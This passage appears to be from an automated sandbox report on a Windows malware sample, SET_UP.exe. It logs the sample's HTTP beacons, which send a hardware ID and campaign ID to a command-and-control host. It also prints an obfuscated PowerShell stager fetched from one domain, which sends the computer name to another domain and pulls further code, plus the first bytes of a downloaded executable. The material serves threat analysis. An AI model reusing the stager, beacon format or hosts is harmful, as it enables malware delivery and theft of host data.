                                                                                                                                                                                                2025-01-05 17:02:26 UTC969OUTData Raw: 2d 2d 4f 57 56 4c 41 38 46 41 35 4f 59 59 56 31 49 53 30 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 43 44 45 31 34 31 31 43 44 43 39 39 31 30 38 38 39 45 45 41 38 38 32 34 37 36 41 43 38 45 0d 0a 2d 2d 4f 57 56 4c 41 38 46 41 35 4f 59 59 56 31 49 53 30 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 57 56 4c 41 38 46 41 35 4f 59 59 56 31 49 53 30 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52
                                                                                                                                                                                                Data Ascii: --OWVLA8FA5OYYV1IS08Content-Disposition: form-data; name="hwid"3ACDE1411CDC9910889EEA882476AC8E--OWVLA8FA5OYYV1IS08Content-Disposition: form-data; name="pid"1--OWVLA8FA5OYYV1IS08Content-Disposition: form-data; name="lid"hRjzG3--ELVIR
                                                                                                                                                                                                2025-01-05 17:02:26 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 05 Jan 2025 17:02:26 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=cqi7ag16mrlfbie526umoio68m; expires=Thu, 01 May 2025 10:49:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TlmffWt3gchBRFJQPPToJ1ErdrtCwAkzfYjSMLqeEP0sw2dxOynSO%2Bhdg%2BV8R3QIkWO4bc68UOZIHWpbFuPvIKPgGu1hu3sXvMzsFzmlD%2BYzbTfnRFmW440B1iejD89P2N3Ud631"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8fd50936fc636a56-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=5398&min_rtt=1605&rtt_var=3012&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1888&delivery_rate=1819314&cwnd=224&unsent_bytes=0&cid=6f39ca2280decb1e&ts=477&x=0"
                                                                                                                                                                                                2025-01-05 17:02:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                2025-01-05 17:02:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                6192.168.2.449755188.114.96.34437480C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2025-01-05 17:02:27 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=T5N7UV5S1D0O744WPN5
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 1110
                                                                                                                                                                                                Host: cutefingeuker.click
                                                                                                                                                                                                2025-01-05 17:02:27 UTC1110OUTData Raw: 2d 2d 54 35 4e 37 55 56 35 53 31 44 30 4f 37 34 34 57 50 4e 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 43 44 45 31 34 31 31 43 44 43 39 39 31 30 38 38 39 45 45 41 38 38 32 34 37 36 41 43 38 45 0d 0a 2d 2d 54 35 4e 37 55 56 35 53 31 44 30 4f 37 34 34 57 50 4e 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 35 4e 37 55 56 35 53 31 44 30 4f 37 34 34 57 50 4e 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c
                                                                                                                                                                                                Data Ascii: --T5N7UV5S1D0O744WPN5Content-Disposition: form-data; name="hwid"3ACDE1411CDC9910889EEA882476AC8E--T5N7UV5S1D0O744WPN5Content-Disposition: form-data; name="pid"1--T5N7UV5S1D0O744WPN5Content-Disposition: form-data; name="lid"hRjzG3--EL
                                                                                                                                                                                                2025-01-05 17:02:27 UTC1120INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 05 Jan 2025 17:02:27 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=pninpq1vl87imi4t7f8nuri3mn; expires=Thu, 01 May 2025 10:49:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IiDdgVTiGrwv7ZLlltkwFP0E5p0RvVZMsF3d416zsNEcZi2eS5e48NpLC8Y4C3Qo1ZgNPCJKJM29Vk7FpaOP9T5tOGdyAXK7vOiXBgBqaPxZYU7uGYJ8j1L8hzrjSBTe2CrGyKVd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8fd5093d38d9c339-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1499&min_rtt=1491&rtt_var=576&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=2031&delivery_rate=1871794&cwnd=247&unsent_bytes=0&cid=fdda10b56e06eec0&ts=488&x=0"
                                                                                                                                                                                                2025-01-05 17:02:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                2025-01-05 17:02:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                7192.168.2.449756188.114.96.34437480C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2025-01-05 17:02:28 UTC268OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 115
                                                                                                                                                                                                Host: cutefingeuker.click
                                                                                                                                                                                                2025-01-05 17:02:28 UTC115OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 33 41 43 44 45 31 34 31 31 43 44 43 39 39 31 30 38 38 39 45 45 41 38 38 32 34 37 36 41 43 38 45
                                                                                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--ELVIRA&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=3ACDE1411CDC9910889EEA882476AC8E
                                                                                                                                                                                                2025-01-05 17:02:28 UTC1120INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 05 Jan 2025 17:02:28 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=os1ons2r9d671eqs7vdqaj9mie; expires=Thu, 01 May 2025 10:49:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9JQy6cIdfyegXft48dvLbKrRJDEvNX3uyzMXLb9FVWv9RFl0PwOBb0jnCdiaqlp7eT9jKqtO165QvATTo3VZm9OtXxaMW8No6wfCcZQSAN4zp4udrcS1CqAfncfKJbdnSJmuUfQ3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8fd509436b14f78f-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1596&rtt_var=611&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1019&delivery_rate=1773997&cwnd=137&unsent_bytes=0&cid=f3952f9dcca70ee4&ts=476&x=0"
                                                                                                                                                                                                2025-01-05 17:02:28 UTC218INData Raw: 64 34 0d 0a 6f 78 50 35 68 46 63 4c 5a 66 58 68 6d 67 61 77 50 52 2f 54 44 4b 71 6b 34 74 41 78 49 79 45 77 46 69 70 47 30 73 66 77 52 33 6e 34 61 4e 76 78 64 54 46 48 6e 5a 58 75 64 73 4d 48 51 2f 78 51 68 63 65 48 74 30 51 4e 55 6c 68 35 57 68 72 39 2f 38 56 77 54 5a 45 6c 79 37 42 6a 50 54 6e 61 6b 66 49 6f 78 45 56 72 38 53 43 49 77 70 62 79 43 78 45 4e 45 6e 4d 49 66 4f 4f 36 33 44 78 62 31 6a 48 44 70 6a 39 2f 45 59 57 53 6f 46 71 66 59 54 43 34 59 4d 50 55 6c 4b 56 63 53 6c 4a 46 66 77 51 31 75 71 69 41 47 31 62 4b 66 59 33 62 4e 47 63 56 71 70 4c 79 5a 35 35 4a 5a 36 63 75 68 6f 61 45 70 42 4d 5a 45 52 77 30 54 32 54 6f 39 34 30 61 0d 0a
                                                                                                                                                                                                Data Ascii: d4oxP5hFcLZfXhmgawPR/TDKqk4tAxIyEwFipG0sfwR3n4aNvxdTFHnZXudsMHQ/xQhceHt0QNUlh5Whr9/8VwTZEly7BjPTnakfIoxEVr8SCIwpbyCxENEnMIfOO63Dxb1jHDpj9/EYWSoFqfYTC4YMPUlKVcSlJFfwQ1uqiAG1bKfY3bNGcVqpLyZ55JZ6cuhoaEpBMZERw0T2To940a
                                                                                                                                                                                                2025-01-05 17:02:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                8192.168.2.449757185.161.251.214437480C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2025-01-05 17:02:29 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Host: cegu.shop
                                                                                                                                                                                                2025-01-05 17:02:29 UTC249INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx/1.26.2
                                                                                                                                                                                                Date: Sun, 05 Jan 2025 17:02:29 GMT
                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                Content-Length: 329
                                                                                                                                                                                                Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                ETag: "676c9e2a-149"
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2025-01-05 17:02:29 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                                                                                                Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                9192.168.2.449758104.21.37.1284437480C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2025-01-05 17:02:30 UTC206OUTGET /int_clp_sha.txt HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Host: klipvumisui.shop
                                                                                                                                                                                                2025-01-05 17:02:30 UTC899INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 05 Jan 2025 17:02:30 GMT
                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                Content-Length: 8767044
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                ETag: "51f99eddd33cc04fb0f55f873b76d907"
                                                                                                                                                                                                Last-Modified: Sat, 28 Dec 2024 20:49:42 GMT
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KyJHf6upBDAs58iendTlLd0xqLOveM7PZUFTICmXtGxyoY4Tt7SdRhy8MIL040aMxNOHHAxzgdaDcwfy9cySOFrm3EbtCp1WHPJjXljK7d0%2F8o5kMpZjXpykG%2FnsVlIaBhZb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8fd5094fc962439c-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1565&rtt_var=609&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2867&recv_bytes=820&delivery_rate=1763285&cwnd=224&unsent_bytes=0&cid=99f0caeec97dee09&ts=282&x=0"
                                                                                                                                                                                                2025-01-05 17:02:30 UTC470INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                                                                2025-01-05 17:02:30 UTC1369INData Raw: 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 60 0b 00 00 02 00 00 00
                                                                                                                                                                                                Data Ascii: R\`.textVX `.itextdp\ `.data88:x@.bssXr.idataP@.didata`
                                                                                                                                                                                                2025-01-05 17:02:30 UTC1369INData Raw: 52 45 53 55 4c 54 04 00 00 00 80 ff ff ff 7f 02 00 44 13 40 00 0e 05 54 47 55 49 44 10 00 00 00 00 00 00 00 00 04 00 00 00 e4 10 40 00 00 00 00 00 02 02 44 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 06 00 0b 40 76 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 28 9c 4a 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 28 9c 4a 00 06 43 72 65 61 74 65 00 00 40 13 40 00 02 02 00 00 00 00 04 44 61 74
                                                                                                                                                                                                Data Ascii: RESULTD@TGUID@D1@D2@D3D4@v@&op_Equality@@@Left@@Right(J&op_Inequality@@@Left@@Right(JEmpty@@(JCreate@@Dat
                                                                                                                                                                                                2025-01-05 17:02:30 UTC1369INData Raw: 72 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 7d 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 7d 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 44 69 73 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 7d 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 94 7e 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 43 6c 61 73 73 54
                                                                                                                                                                                                Data Ascii: r@MTObject&}@Create@Self$}@Free@Self)(JDisposeOf@Self>}@InitInstance@Self@Instance/~@CleanupInstance@Self)(JClassT
                                                                                                                                                                                                2025-01-05 17:02:30 UTC1369INData Raw: 01 02 00 02 00 5b 00 e8 80 40 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 28 13 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 08 9c 1f 40 00 01 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 00 11 40 00 02 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 31 00 08 81 40 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 0c 81 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 10 81 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 02 00 3f 00 04 81
                                                                                                                                                                                                Data Ascii: [@SafeCallException(@@Self@ExceptObject@ExceptAddr1@AfterConstruction@Self1@BeforeDestruction@Self9@Dispatch@SelfMessage?
                                                                                                                                                                                                2025-01-05 17:02:30 UTC1369INData Raw: 40 00 02 00 05 41 46 6c 61 67 02 00 02 b8 12 40 00 08 00 05 41 44 61 74 61 02 00 02 00 00 5c 23 40 00 07 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 b8 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 8c 23 40 00 14 08 50 4d 6f 6e 69 74 6f 72 8c 24 40 00 02 00 a0 23 40 00 14 17 54 4d 6f 6e 69 74 6f 72 2e 50 57 61 69 74 69 6e 67 54 68 72 65 61 64 c0 23 40 00 02 00 00 c4 23 40 00 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 9c 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 2c 24 40 00 0e 12 54 4d 6f 6e 69 74 6f 72 2e 54 53
                                                                                                                                                                                                Data Ascii: @AFlag@AData\#@HPPGENAttribute"@4 @System#@PMonitor$@#@TMonitor.PWaitingThread#@#@TMonitor.TWaitingThread#@Next@Thread@WaitEvent,$@TMonitor.TS
                                                                                                                                                                                                2025-01-05 17:02:30 UTC1369INData Raw: 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 ec f1 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 2b 00 00 f2 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 14 29 40 00 07 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 2c 28 40 00 9c 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 47 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 f1 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 cc 83 44 24 04 fc e9 21 c9 00 00 83 44 24 04 fc e9 3f c9 00 00 83 44 24 04 fc e9 41 c9 00 00 cc 6d 29 40 00 77 29
                                                                                                                                                                                                Data Ascii: truction)@Self1@BeforeDestruction)@Self+@NewInstance@Self)@TInterfacedObject,(@@SystemG)@@@RefCountD$!D$?D$Am)@w)
                                                                                                                                                                                                2025-01-05 17:02:30 UTC1369INData Raw: 56 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 10 40 00 08 00 00 00 02 09 56 53 68 6f 72 74 49 6e 74 02 00 b4 10 40 00 08 00 00 00 02 05 56 42 79 74 65 02 00 cc 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 07 56 55 49 6e 74 33 32 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 00 11 40 00 08 00 00 00 02 07 56 53 74 72 69 6e 67 02 00 00 11 40 00 08 00 00 00 02 04 56 41 6e 79 02 00 d4 2b 40 00 08 00 00 00 02 06 56 41 72 72 61 79 02 00 00 11 40 00 08 00 00 00 02 08 56 50 6f 69 6e 74 65 72 02 00 00 11 40 00 08 00 00 00 02 08 56 55 53 74 72 69 6e 67 02 00
                                                                                                                                                                                                Data Ascii: VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@VUString
